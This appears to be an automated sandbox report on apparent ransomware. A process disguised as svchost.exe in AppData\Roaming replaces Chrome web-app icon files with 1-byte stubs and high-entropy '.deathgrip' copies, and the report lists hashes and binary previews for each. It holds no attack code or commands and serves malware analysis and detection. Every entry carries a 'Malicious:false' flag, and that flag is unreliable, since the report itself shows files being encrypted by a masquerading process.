                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\48.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2768
                                                          Entropy (8bit):7.906240019567729
                                                          Encrypted:false
                                                          SSDEEP:48:bj5xpI2kfxwnXeRTgTIDlEL1jUj6VeeflntiTUmWWF8c:X5Q2kyXeRT2IR81o2VeeflWRF1
                                                          MD5:28179E823DC7629B833796B78E438101
                                                          SHA1:77AF09531752B41B0A8ADA15860F41836C4B4242
                                                          SHA-256:436CAFC6DC96DB09340D3BCCD6070DFBB84EC6D2CD163FA47BE76C30568579E4
                                                          SHA-512:E5DDE33A874FBFDF3B128CEB4C3B6E7F62DD9E791AC45A77F699358BF1C40FA23FCAD8C7E211815248F7E5B125C75F4DF9F65011492EBB0A36D2B0A957A9CB76
                                                          Malicious:false
                                                          Preview:............r.)Y.o....,BZJ..lj..v.k=\.z..].:....8.V..7.... .f[.<.....38....k..B.8..xE..@..]W...nkI5.+J...;...(3..q....l.9..K8b?..n..M...Q=0.......$]?.C.p..(...(.NE....JT7..F.{d..^.%u...rx*..M........t..a@.#.j.*...@b..+....NO..2..\...F.m....$...!..].x...+a....;z...%D..Sqa@.m.J.H.....X....w.4..U"6.[}~N.yn.o{X.?.).w..`'o.x....Kk....s...k...F,........2.$.8<.i.T........2._..*.i..3,.g..%...f.....E|..t.2.Z...C....".IY.K..VF.........A..&...h.....".I..2C.s...b..0......W..%G..._..7..o..j......I..3=mx."HGu...v|....F..F.f .%..:..._.4.."Z.._....j..P.v.1....i.]n...J]2.$...L....t...+..6......3.......zU.QK&{t.{a..<.J!\.Sq..R..i....d..B...W.....j..F}f.R.....B$.\h.>6...'..3.x.``..U.P.\Y0..N.X.=.2.>D..7Y.|...\U........3.....y^3..!...L......B..x..~<:.3...(Q..@J."....Z;F.%.B.#..[Y.3...X.A.@.H._.1.Q....|;..o..WK..../.%..A.c..x...m4-.B...._.k=.....g.\.cT....}d).......*.k.@'g.'d....ZB..)ZE{..|1Jq.^z'.V..q....P"s...`.....i........x...B..+...+m....6.[_..........

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\64.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4144
                                                          Entropy (8bit):7.940876124510287
                                                          Encrypted:false
                                                          SSDEEP:96:MK/tRJ6whYln0JVv9Bm9QiGNO0XcpKpypK4Nb5n8iQ7+fN7NgMVVKdD:MK/vJ9h20JVlBma60skKK+8iQ7+fNxgL
                                                          MD5:DC0855982F7C981B6F243A2ABD61D6B4
                                                          SHA1:B8FACBF355B7C3277E3AAC9445F57D10C62F7E51
                                                          SHA-256:696EA8C01E551180A049BB6A3F8ACD5771F66493468480E6852E496747156D1F
                                                          SHA-512:A25CCF93800D7F4F6FD303575C251D5BDF667679144193D8381089CD5578B90649450FD949C4AAAD1C6AA2B28F50143C21C374EF540E9F480DAA9C792418426A
                                                          Malicious:false
                                                          Preview:........;..c..../..+..i..Ad.N}...@6bx>.sL>.....-a...`U5...F(.~+J.....c...N #..N!.=..d.\.].....L.%OjD.$.#...V.$...X.J........+.'..i9..+......!.%2.a..m..K_.../...P.'.nzN@+.|..U..Sy..7.;....R.J7.. .Eo.......)7i.........C.1.>..y.i..^.i.1..u..`....U^b.y=..V_..p..cs.6....B..}./....?^.'9...4a...^q.s.t..-x...*dax7cAt3.E....&1..y.P.^..B.}..WeII.'..%7U..#.?.D.aD....&@...w.....#.k...#q...d<....K7....%(L4r...boMf.8.&.E...W.3..P.R.C...bwR6.u..c........PC...F..{..<..#|CCT..g .....\7X...k#...h.L$...........S........z....~.1`.h........W.3eJ...4:...c17........X....<...]..ma....u.._#.P....:.1[i,U.G..t..a.F.L..f.B....Z.h&C...>..7...,........(q.L...w... C....|?u......v..]...........d...*^`.5z....R...i$.YE.v..q..0c.....y)........S1ND=HE(...n...O"8|9..F=h7k.....[!..t..yQ...3a[.d.n.|...D.1Z....f..&....x}.dDU...E1.....*......m*...!.%.1...._.$..(....._b.+Lm...8......wl&#u..m<~.cw...a.a...gq..X.a%Q..1.D..v....|.......g..&j..!...!.....'..T<.5$..t.`.h-.T. :..@.m.]|.#j

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\96.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):7072
                                                          Entropy (8bit):7.970756364566833
                                                          Encrypted:false
                                                          SSDEEP:192:jORUtvmDFSdPdAciwoxqcP7IEHnOIsSKTVh3P:jOSvUeCHt1HP073P
                                                          MD5:F3DA69B1E9039FCF9BD96886BA4E0C6F
                                                          SHA1:DFDFC1042314D54CB4CA0DAE5B19DB3F4AC926DA
                                                          SHA-256:A00BB79936D879778D75F1B07C8520A2AA1F147ED3FAE195FB91B35E85329D8F
                                                          SHA-512:DDE66DCA4F9A1787155CCCFDA71111336E095D78004C8876441C57B83C0430831934880F37BE21F0C6615B74FE4E99FD9C7403305D303D638543691308C2C974
                                                          Malicious:false
                                                          Preview:..........'...Z....2..!.....\.l]0.76...$...H/..a.s..[..*..].\.~...^....,Ko......N.L.sL......r5.@.9..|...)...b.v...]].|..t.y'.........}..w...c..."...Q.X..!...d.;..I...?..?u.U6...>.....M.h...h.....*....Y.bYVS.....6..U#@.*.OrR.t...B.Y.f.....j3.Q...'Y\.u..Y?7./..2*.)!....KM\..3.RR..........k...*.t....P.......Z.-.....N.!g..g+.uYp_....Tw.m.....M..l......24.u..S..T.H.{Fy_.@....H+...*#zF...[.?.N.X......o...O..0:U.|........tP...m..../,..."..&.J.n4.....rM...KioN.8D"...[.9..,......a......:.....'.bSy....}....~.>-S.>..&..U...v...=6...i.........t...Q.h..u.6....T..^.|.j.0..D.g0..m.M..;....[;E.b....2...,.[..8.|.F.........}...y..B...M....+$Mb".aX...<.........(...l".]....?R}.m....ZH...Kl.vJ.7.].fbt...qJ.Yl"P...';.x.YYC.Y..k.m....+=..z4...?,.A..Uy....8.5.ew...#S.|1.V..].U..".....K.....|.....;..i.U\..$.R..m)i.h..Y./.V..R.`5Xo>1..E)#'.V....M.)b.....#Mh.r.\"..B.l..^z..Y.....^.;%^.q.a.....q..!..&.|.....(.8./i%...&W.E....2s\)8sz...-...Y..N<.....>4.%....c.."

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\128.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\192.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1648
                                                          Entropy (8bit):7.804898483275565
                                                          Encrypted:false
                                                          SSDEEP:24:0pGipEYGQ+OKOe60Aj4hjbhX9yjf6Z270lKRkkU4qdTOG3sA0MSAgKal1XA/7m:z0jGeKKMhX9yj82Y8RidgiRgKGX5
                                                          MD5:2C7AF751CC04D69DFB93518855FA486C
                                                          SHA1:2A524BE93A99683BD5FFF07F691593AA11DCFBD0
                                                          SHA-256:C5E70C4591C17D626C5C182C7F2800B5D6131AC265D927B4FFFF6271F8C55ACE
                                                          SHA-512:3CBE7C8C7C898AA71AE48E0CE5068AE775B0423A24957D3D99960063F973D90D3CFCC94FF52FCB75001897E380B5B56A53C65DD8CD038175A6939AEE00DA64D6
                                                          Malicious:false
                                                          Preview:........I+,....w.u(.I[.W...#.K.....K..W..t....{..o M...p.a......ydx.e.Z|E4..H....]._:sI{@..W.r...i4.....Q.....z.N..h...S..Pvv..+.gX^..(...D..v.+...\.'..gzn...2p....w.N.|z.r..C/IQ....rp...Z8.u6....J..7....|n ..o[|.. ...*..F.r3S...b.l.o.p...T....'D.;..-...,....h....N.<.y..[~.6.m.6....Q:F..`..x............]..R.Y..`.4.t.{._F..E..C......M...;...P.x3.jcc....L~..2......%./.......C.E...@..f.&a....O.x.T..E....k..p...I.z..~=.k...v.w.j?..q....G.:.d...^m.,\7...........)..*I.......f!......?.D0.........KU.s..".....y..g..O.C.(.............Qzk.z.......n.^...A.T...GN...1.@li...k.X.T..U..E.*C..F..t...0+/.yIw.T..j....&.R..q..Y.G....Z..X.'O.....L...T....D..iZ...W.@."...e.).....!.q..a..T./.k.W.sf....._(.......3&.t.i.&..W._N.~.Q....0.n.+.(rVs$..U.p....RB.+.&i.!R..c..7.cs.:...U.....J..e%WG.`.~..2..F$8.U.3...y.].cb%m..5k.....>..K}....3s..>J.S.rX.'.b).L.-...g...4A....../..W..=.t.t...&O.^.A..A..~*.pFt...c'5.+3..#."e.U-.,..Rh.\BGT.b.|;..Z$q...@.\..b......."...q..

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\256.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5552
                                                          Entropy (8bit):7.963330114220022
                                                          Encrypted:false
                                                          SSDEEP:96:L2mHHQU5il7gWpMzGbKp3uavxy2vAhIFFQgY8inQUMvaMoQjRGdg:LJnQU5itpMz8Kp3NAOFDY3rMvelS
                                                          MD5:54F48AB681E4EAAF42597D23C87A2082
                                                          SHA1:B51BBFC7B522C773A691C58C3A9531EAD2A2C62E
                                                          SHA-256:A446ABC1514A796AD490BEE3567ED1D9180B64B203D1B6AA3CC8473494F90E84
                                                          SHA-512:CFA02E3A943DD5F6117B2B37C52A9A93F0478E49A996989375456ECE5324C55EE0876B3C6ED0534B8334F2627B245F8EF980A76CB96B93713864AD15A51BABCB
                                                          Malicious:false
                                                          Preview:.........N@.....Q.......T..%..=t.?.-...^7W..]...@...#.T..[T..3F.......M..."{.P..uA......x....|..........a.........C[...y.U]"..?.I;./..\.;..x.{.Z.v...^...U4M.2L.8.7V.......z..&f.I..p.E....a...h6...(....Ga..M..@....f<^.,.i@nR. ..!/..2w.}f..... {.....5. ..j..~.^......6..qIWwY....@.......@.R...=...G...7W.Q..n...2.._.L.I.=.eN|..RH8..90.W....yp.Vy.mJX.g.`b..-...'?".K...?.#..C>8..@.Zef.0.ea.tY76.j.T.6....%.t....)....0U.5.l..!.?...$... ..A.J[#1.:HS.w..o.."ju..2.....=84 [L........rr..u.........P..J./?.Be.0..z.*8....d|.ZlU...W<?.......K.K..xe..9.*.O.7..c.....4tu..}.1..7.;...v..c..W....E....".....}n..)..t...^.|K...eN...0T(...2T....C...C...7..:c.23.xf....!........H..w..7A7...~P...m...U.... ?i.._..:.^.aj.!....o.L..Y.Is.[)..:;.).g.4.1.hv.C`...0V.{%........<E..Q........%......W#..x.N*W...'...28^.x_M.......$..t+..l.C..,.../..K..@...WH..*.@...9F5UZ1.3..?0.H... Hh.J...&...:mq..L.`>.}..A.;..{...z8..%.........0..>:...^..7...y."m.P......|.? .......W..5.

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\32.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1392
                                                          Entropy (8bit):7.746729580608851
                                                          Encrypted:false
                                                          SSDEEP:24:PnqL1pWExysKWbrSCly/mjxI7+8pltMQaDEoctKCL2xfrbypk9He7wgwASoFrh:fwSIyo1lygI7fltfafctKTxDbypk9HhG
                                                          MD5:015396CC7E2EB2FAE8091992E6715390
                                                          SHA1:BB32FCBEFEE223DA79291FBBD4F6A99606B57DF3
                                                          SHA-256:C84D2FF63A794D9AF488FAA922BA63B72C3EBD408183637C3F7DDFD32A51E965
                                                          SHA-512:3C32E006C089B8FE5949816E0152610CC2124229C808A49DA8724883CAA50607F8B6753B7A6AC80BCE3342FC8DC1F6497F69476C1CB44DAFDB11FE9F5D2131FE
                                                          Malicious:false
                                                          Preview:..........8.......b8."....j....|x).....bbI.q.L.s.qS....$.N.N...9.I.^..6HY.3+9.7....P..x..jZK.31....x./..........R.......^..<....hw.?.._.`do..Z...I}.Pz...nK.[RP....*..If...2..Gb......;.)/~....$.7u....'..psP.Ek..~......-.Fj...5'..Y1........>...zn.2B..... .z..`A;...m.K...=...Z.M....g%*a........)'.0m.,...}.l)~.P...H.....,.^e.].....Z}.(_..!..5Z.P...g..J.F..>8.....>.......Hl...=w]...^..7tl..h...o.].....12#....;.ah.$E.qb...O.]...9.j..hf)OD...Y]..J(>...."<.?....h.....>_.*H...|V%[..L....E..8..}?...\x...Zb.ka..e...pH4...B..I.oA..,.r.m...O.!...-......3......JQ.~.A...#.......)?f@.?he.0...'G..P...wg....7yd.l.H.Y.....6....{#GK...-...$B...u.b.`U..wz..X2.u.tJ../.]..K..V~4/Ph.E..."...FQU..t]F.gH..K..J..vx......`=(-..C...t..U......4...]>(p....<...Pz(6...9..]_...*{..3y/a.?"9.:.|PP..*..=..'%.2..H.2...\l.#.."...........l.4.i...3..R.'w..t..'..:..X....!_}..U.r...f..DP.5N/..-.#s.i.^1Ma.g.....z....{..i....,......*./.bl..W.M...._...+0I\%3/a..c.h|i.t.......~X4..W

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\48.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1728
                                                          Entropy (8bit):7.812674826531025
                                                          Encrypted:false
                                                          SSDEEP:48:VIMLE65Uc9Mxkjm2hmEKr5u4o18JQUWmSzMVGr:VIMLAci2wdu4g0QfmSzMVM
                                                          MD5:BE4DC7308B73BE7402FF54FAE4CC8FE4
                                                          SHA1:5594304A6444A234B298FC5D4E0AB24942B79D52
                                                          SHA-256:5645C84F9664A355CEE5A5B5BC8D2E3C2B292DE2597128258B9ABD963127286E
                                                          SHA-512:9E71265689FBE2A5041B5D729353FE743B2C6FFBF367C24AA8589A6D492B9611D8617D4B4AB270BFE6D9770792EF95FAF6DFBC6DAF3420AC8D817D4DD54F0D21
                                                          Malicious:false
                                                          Preview:............j.@qI%0..D..}.$..z.....pE.I..*X.k9.;....2......5>.."._.p6.~..hk.....L.k.U..b.J.G.}.O..S:}.{.../.H.DU......t...z.....[.B.).k....&g*..8u..N.HuY....+.d...=f...&7....p@/..t...0x&...t.p;..*....1Pj.M.&.].....?<..n.gQ.f..6,@..O.....*..T....hv`^.^........5r..g?U...I5?$....9.&.....U56nmv.{..(...{i...].#...x}.R&g.i....&e?W..r`(,..)p1.....|....!8b.~b...T.d..F.,tL?)|}n ......$.p.hZ...h.......r.!{.R..L.._."oV#F..Z.#97..fp.WT.y.1...3...]....O.+..1.;..g.Y.P.o9.\JA..Z.q.A.....q:E..X".....'...w.1mPu....#$.$`>,/..B....._...6'.q.....,@.c.c;..@..w.'.~.S..$5.q6.P5g...G.X}+.3q..d.Pu.....Xra............n..1......e.OE.ZDA.6.."R.~.......C..x...G._...dw@.Gq...7H.....=&Z@.....&...l=....*.~...(...J..M~.M.2Kj.]x~j...m...r..{u..21~.AO.*...l.t.....a...IS...C8...'..,7...K.V.b8.gt......Z*.ME...nU6.b..q....!..5:...$6mK....}.WV.....y...r.p....=...|E.{..1E.B..W.Mf....Gl..rTwKj..*.....O...8...W..)#b..@.(B.......0..p.e36.....`.s.e....Fb.De..q..cY.'.4...L.<.VB.`..

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\64.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons\96.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2208
                                                          Entropy (8bit):7.858600225376065
                                                          Encrypted:false
                                                          SSDEEP:48:4PKPmgydbU9uRjfqqpJdsXNK+lkqAOWG/6FLUQMj:igyFR7XXg0y/y6
                                                          MD5:5DD5B1C4ED507EB6E4F6FA55671825F0
                                                          SHA1:CDA42811B84C803A5A6C35456CE61DD274BFD0BB
                                                          SHA-256:F28CA3CDDC556AEE5058EE4ADB9CCABCA7D1B0DEB36D9F088DD9E6C7FD459897
                                                          SHA-512:B37AD3EE7FF19BD91A2364F58AA2247321DB3342E56F923264DCF95F92EE7CF30DF78AA81ADC1DF0A75A79BC472A4F54228080D2464BF23E5A3E30210029711C
                                                          Malicious:false
                                                          Preview:.........m.}2-..J3.x.........f...z...B.'.k3(2..;.[.......,b...<.............O...kS.5pfl........H&..b.....mJk1...w.\..L%.>.@\.rS.7.kU~..qD...t...{]W.$..v.)7.;.B.=..BV.y>...\..#g...}A..1...ncTM..U[.x.8.^.....\.5:.[!.*...B.[9T.tO.S.N.z.p^....~..^0........:.c.K.%....'.......|#.........zu.#...b.5...f0%....9.......(...._..>WXg.W.`P...F.e.A.y...d0L.V.\...-9dpB.rn+...k.l....j....Q.S....A..@.3.&.2...8.U..s.../../.....!..Z.d.-d...[...;.Hk..].8l|n&..X.....x...O/......5.D.M?).....U.S...E7. .?)..7wS...Sx......e...).cE..p4..E.;..Z..........p..@D..k....k_&).S.D.A....|...?.V..mT..ot...3-..6j..@r.z.......?...7r{...J.S..C...$...s.v.....\..%.Z.#5..C`T...z....:..WN^..".IF.`s.N._L..Ar....XM.f..r8..W..Nw...)].P.......#..\....R.....>...%.Y..r.......~.c...._...,Cx.....E....)R..@..=8....9..z....5Q...yV...-$U...(Kq.]r....X..Y..G$cG..^.........p."c?.r..=.#..EB.w^g.J...N3.(|S$...F..E.}m..L._h...).r.c.u..ZD.(`._..........z.".0R.%(.!..['o.f0.P...EO...Ub.).7..

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons\128.png.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5744
                                                          Entropy (8bit):7.963137250159314
                                                          Encrypted:false
